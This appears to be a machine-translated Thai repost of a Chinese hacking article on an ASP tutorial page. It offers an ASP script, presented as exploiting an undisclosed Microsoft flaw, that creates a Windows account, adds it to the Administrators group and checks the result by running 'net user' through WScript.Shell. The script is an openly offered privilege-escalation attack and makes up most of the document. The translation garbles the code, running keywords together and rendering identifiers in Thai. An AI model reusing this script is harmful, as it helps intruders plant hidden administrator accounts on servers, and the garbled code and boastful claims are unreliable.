หน้าแรก>บทช่วยสอนการเขียนโปรแกรมเครือข่าย>กวดวิชา ASP

เพิ่มรหัส. asp ของผู้ใช้ Super [Blue Screen Original, Kevin Improvement, MS ไม่ได้เผยแพร่ช่องโหว่

ผู้เขียน:Eve Cole เวลาอัปเดต:2025-04-16 13:00:04

เพิ่มรหัส. ASP ของผู้ใช้ Super [Original of Blue Screen, Kevin Improvement, MS ไม่ได้เผยแพร่ช่องโหว่]

ผู้แต่ง: Blue Screen, บทความของ Kevin ที่มา: Freezing Point Extreme

ที่จริงแล้วเควินกับฉันทดสอบมันบนไก่เนื้อของฉันเมื่อสัปดาห์ที่แล้วและ Hippo Epic ผลที่ได้คือผู้ใช้ของกลุ่มผู้ดูแลระบบได้รับการเพิ่มสำเร็จภายใต้การอนุญาตของผู้ใช้ (แม้ว่าฉันจะไม่เชื่อสายตาของฉัน)

ครั้งสุดท้ายที่เควินไม่ได้พูดอะไรเลยฉันไม่กล้าโพสต์ ... ตอนนี้ฉันเห็นเขาโพสต์ไว้ในบล็อกของเขาดังนั้นฉันจึงย้ายมัน (มันดีกว่าตอนที่ฉันทดสอบครั้งสุดท้ายเล็กน้อยและฉันเพิ่มแบบฟอร์ม) ตอนนี้ฉันโชคดีสำหรับทุกคน `` `

อย่างไรก็ตามรหัสนั้นถูกต้อง แต่ก็ไม่ค่อยประสบความสำเร็จมันขึ้นอยู่กับโชค - ฮ่าฮ่าขั้นตอนต่อไปฉันต้องการรวมเขาเข้ากับมหาสมุทร เฮ้-เธอ

การคัดลอกรหัสมีดังนี้:

<head> .Network Object Script Permission Enhancement Tool Tool Tool </head>

<formaction = "useradd.asp" method = post>

ผู้ใช้: <putName = "ชื่อผู้ใช้" type = "text" value = "kevin1986"> <br>

รหัสผ่าน: <putName = "passwd" type = "รหัสผ่าน"> <br>

<inputType = "ส่ง" value = "เพิ่ม">

</form>

<%@codePage = 936

onerrorresumenext

ifrequest.serverVariables ("remote_addr") <> "127.0.0.1"

Response.write "IP! SN0Tright"

อื่น

ifrequest ("ชื่อผู้ใช้") <> ""

ชื่อผู้ใช้ = คำขอ ("ชื่อผู้ใช้")

passwd = คำขอ ("passwd")

Response.exext = 0

session.timeout = 50

Server.ScriptTimeOut = 3000

setlp = server.createObject ("wscript.network"))

oz = "winnt: //" & lp.computername

setob = getObject (oz)

setoe = getObject (oz & "/ผู้ดูแลระบบกลุ่ม")

setOd = ob.create ("ผู้ใช้" ชื่อผู้ใช้)

OD.SetPasswordPasswd

od.setinfo

oe.addoz & "/" & ชื่อผู้ใช้

Iferrthen

Response.write "เฮ้ ~~ คุณไม่ควรซื้อ 6+1 วันนี้ ... ดีกว่าที่จะประหยัด 2 หยวนซื้อขวดโค้ก ... "

อื่น

ifinstr (server.createObject ("wscript.shell"). exec ("cmd.exe/cnetuser" & username.stdout.readall), "เข้าสู่ระบบสุดท้าย"

Response.write "แม้ว่าจะไม่มีข้อผิดพลาด แต่ดูเหมือนว่ามันจะไม่ประสบความสำเร็จคุณต้องรู้สึกหดหู่มาก"

อื่น

Response.write "OMG!" & ชื่อผู้ใช้ & "กลายเป็นจริง! นี่คือช่องโหว่ที่ไม่รู้จัก 5,000,000RMB เป็นของคุณ"

endif

endif

อื่น

Response.write "โปรดป้อนชื่อผู้ใช้"

endif

endif

-

บทความที่อาจเป็นที่สนใจของคุณ:

ปฏิเสธระบบการจัดการโฮสต์เสมือนพิเศษระดับพิเศษ, เดสก์ท็อประยะไกลของผู้ใช้ FreeHostrunat, ปรับปรุงระบบรักษาความปลอดภัย, วิธีการเพิ่มผู้ใช้ที่ซ่อนอยู่ต่าง ๆ , ดึงรหัสผ่านผู้ใช้ขั้นสูงของ Redhat Linux 7.2, วิธีการเพิ่มผู้ใช้ Super Super ให้กับผู้ใช้ทั่วไป
บทความที่เกี่ยวข้อง